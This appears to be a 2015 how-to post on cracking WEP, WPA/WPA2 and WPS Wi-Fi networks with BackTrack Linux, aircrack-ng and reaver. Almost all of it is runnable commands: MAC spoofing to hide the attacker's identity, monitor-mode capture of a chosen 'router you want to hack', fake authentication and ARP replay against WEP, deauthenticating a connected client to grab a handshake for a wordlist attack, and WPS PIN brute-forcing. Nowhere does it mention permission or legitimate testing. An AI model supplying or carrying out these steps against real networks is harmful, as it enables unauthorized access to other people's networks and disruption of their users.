27.04.2015

Cracking WPA/WPA2

What do i need for cracking Wireless Networks? :
Backtrack Linux (http://www.backtrack-linux.org/)
Brain
Computer
Commands
Wireless Card that supports packet injection
Wordlist/s for WPA/WPA2 Enrypted Networks
Which Wireless Cards are supported? :
Is My Wireless Card Compatible ?
http://www.aircrack-ng.org/doku.php?id=compatible_cards
Which is the best card to buy ?
http://www.aircrack-ng.org/doku.php?id=c…ard_to_buy
I recommend Alfa Wireless Cards
http://www.alfa.com.tw/products_list.php?pc=34
I use the following products without having any troubles :
AWUS036NH
AWUS036NHA
Where can i get Wordlists? :
InsidePro
Packetstormsecurity
Skullsecurity
Alphabetic and numerical Wordlist Generator
#
..


How do i install my Backtrack Linux ISO to a USB Drive/Stick? :
1. Open up http://www.google.com/
2. Search for ‘UNetbootin’
3. Download the program
4. Connect your USB Drive/Stick to your Computer
5. Open the executable you dont have to install it because it is a portable version.
6. Follow the options in this picture
[Image: A4GEGbH.png]
7. Select your Backtrack Linux Operating System ISO,USB Drive and press ‘OK’
How do i boot the Backtrack Linux Operating System? :
1. Turn off your Compute
2. Connect your USB Drive/Stick to your Computer
3. Turn on your Computer and enter ‘Boot Menu’ or ‘BIOS’ by pressing F1,F2,DEL,ESC or F10
4. Change boot priority to USB Drive/Stick
5. Save BIOS Settings and reboot if necessary
6. Boot Backtrack Linux
7. When your Screen freezes/stands still enter the following to the command line : startx (This Command starts the GUI Graphical Interface)
[Image: 8vAttE6.png]
8. You finally booted Backtrack Linux you’re ready for Cracking Wireless Networks now
How do i change the Mac-Adress of my Wireless Card ? :
1. Open up the Terminal/Console/Command Prompt
[Image: IJ2faKc.png]
2. Type in ‘airmon-ng’ to see your installed supported Wireless Card/s
Code:
airmon-ng
[Image: t6tyJmU.png]
3. Type in ‘ifconfig <interface> down’ and press enter.
Code:
ifconfig <interface> down
Code:
ifconfig wlan0 down
4. Type in ‘macchanger –mac 00:11:22:33:44:55 <interface>’ and press enter.
Code:
macchanger --mac 00:11:22:33:44:55 <interface>
Code:
macchanger --mac 00:11:22:33:44:55 wlan0
5. Type in ‘ifconfig <interface> up’ and press enter.
Code:
ifconfig <interface> up
Code:
ifconfig wlan0 up
[Image: UCpH233.png]
alternative way
1. Type in ‘ifconfig’ and press enter.
Quote:ifconfig
2. Type in ‘ifconfig <interface> down’ and press enter.
Quote:ifconfig <interface> down
Quote:ifconfig wlan0 down
3. Type in ‘macchanger –r <interface>’ and press enter.
Quote:macchanger –r <interface>
Quote:macchanger –r wlan0
4. Type in ‘ifconfig <interface> up’ and press enter.
Quote:ifconfig <interface> up
Code:
ifconfig wlan0 up
How do i monitor/search for Wireless Networks in my area ? :
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
2. Type in ‘airmon-ng start <interface>’ and press enter.
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Type in ‘airodump-ng <interface>’ and press enter.
Code:
airodump-ng <interface>
Code:
airodump-ng mon0
[Image: HsF0SxL.png]
[Image: yB7vHfu.png]
Security difference between all Wireless encryptions:
WEP (Wired Equivalent Privacy) : easiest and weakest Encryption, needs no Wordlist to crack
WPA (Wi-Fi Protected Access) : middle and insecure Encryption, needs Wordlist to crack
WPA2 (Wi-Fi Protected Access 2) : hardest and strongest Encryption, needs Wordlist to crack
WEP<WPA<WPA2
WPA2>WPA>WEP
WEP (Wired Equivalent Privacy) Cracking :
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
2. Type in ‘airmon-ng start <interface>’ and press enter.
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Type in ‘airodump-ng <interface’ and press enter.
Code:
airodump-ng <interface>
Code:
airodump-ng mon0
[Image: RU2urKd.png]
4.Type in ‘airodump-ng –bssid 00:23:69:AB:B8:38 -c 11 -w WEP <interface>’ and press enter.
–bssid = Macadress of the Router you want to hack
-c = The Communication Channel of the Router you want to hack
-w = The Name of the Capture File for all recorded packets
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w WEP <interface>
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w WEP mon0
5. Type in ‘aireplay-ng –fakeauth 0 -a 00:50:F1:12:12:10 <interface>’ and press enter.
Code:
aireplay-ng --fakeauth 0 -a 00:23:69:AB:B8:38 <interface>
Code:
aireplay-ng --fakeauth 0 -a 00:23:69:AB:B8:38 mon0
6. Type in ‘aireplay-ng –arpreplay -b 00:23:69:AB:B8:38 <interface>’ and press enter.
Code:
aireplay-ng --arpreplay -b 00:23:69:AB:B8:38 <interface>
Code:
aireplay-ng --arpreplay -b 00:23:69:AB:B8:38 mon0
7. After collecting more than 30.000 #Data packets you can start cracking the Capture File.
[Image: urNIXY1.png]
8. Type in ‘aircrack-ng -b (bssid) (file name)-01.cap’ and press enter.
Code:
aircrack-ng -b (bssid) (file name)-01.cap
Code:
aircrack-ng -b 00:23:69:AB:B8:38 WEP-01.cap
WPA/2 (Wi-Fi Protected Access) Cracking :
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
[Image: t6tyJmU.png]
2. Type in ‘airmon-ng start <interface>’ and press enter.
Code:
Bring your card/device in monitor mode with the following command
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Type in ‘airodump-ng <interface>’ and press enter.
Code:
Searching for available Networks with WPA/WPA2 Encryption and connected Clients/Users
Code:
airodump-ng <interface>
Code:
airodump-ng mon0
[Image: yB7vHfu.png]
4. Type in ‘airodump-ng –bssid 00:23:69:AB:B8:38 -c 11 -w Linksys <monitor-interface> and press enter.
Code:
After you have found a Network start capturing Network traffic with the following command:
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w linksys <interface>
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w linksys mon0
[Image: c0niuRy.png]
Red = Target Router
Green = Connected Target Client (Computer,Laptop,Iphone,Smartphone…)
5. Open a new TAB/Console and type in ‘aireplay-ng –deauth 10 -a <bssid of access-point/router> -c <mac-address of client/user> <monitor-interface>
Code:
Open a new Console/Terminal tab and get the Handshake with the following Command:
Code:
aireplay-ng --deauth 10 -a 00:23:69:AB:B8:38 -c AC:72:89:47:D7:DB <monitor-interface>
Code:
aireplay-ng --deauth 10 -a 00:23:69:AB:B8:38 -c AC:72:89:47:D7:DB mon0
[Image: EIaqISk.png]
[Image: Mr8TdtM.png]
6. After we have found the Handshake we can continue with a dictionary attack / wordlist attack to find the password by entering the following Command ‘aircrack-ng <filename-01.cap> -w <file path of wordlist>’
Quote:aircrack-ng <filename-01.cap> -w <file path of wordlist> //filepath not needed when wordlist saved in home folder
Quote:aircrack-ng linksys-01.cap -w Wordlist.lst
WPS (Wi-Fi Protected Setup) Cracking :
1. Bring your Wireless Card into the monitor mode.
2. Type in ‘wash -i <interface>’ and press enter.
Quote:wash -i <interface>
Code:
wash -i mon0
2. Type in ‘reaver -i <interface> -b <BSSID> -vv’ and press enter.
Code:
reaver -i <interface> -b <BSSID> -vv
Quote:reaver -i mon0 -b 00:23:69:AB:B8:38 -vv
3. Type in ‘reaver -i <interface> -c <Channelnumber> -b <BSSID> -S -L -vv’ and press enter.
Quote:reaver -i <interface> -c <Channelnumber> -b <BSSID> -S -L -vv
Quote:reaver -i mon0 -c 11 -b 00:23:69:AB:B8:38 -S -L -vv
4. Type in ‘reaver -i <interface -c <Channelnumber> -b <BSSID> -p <PIN> -vv’ and press enter.
Quote:reaver -i <interface> -c <Channelnumber> -b <BSSID> -p <PIN> -vv
Quote:reaver -i mon0 -c 11 -b 00:23:69:AB:B8:38 -p 12345678(Example) -vv
5. If you have any troubles/problems going through this steps feel free to enter ‘reaver –help’.
Code:
reaver --help
Where are the Capture Files located/storaged at? :
All Capture Files are located at the Home Folder of Backtrack Linux.
You only have to open the Dolphin File Manager to see your files.
[Image: zP2gSec.png]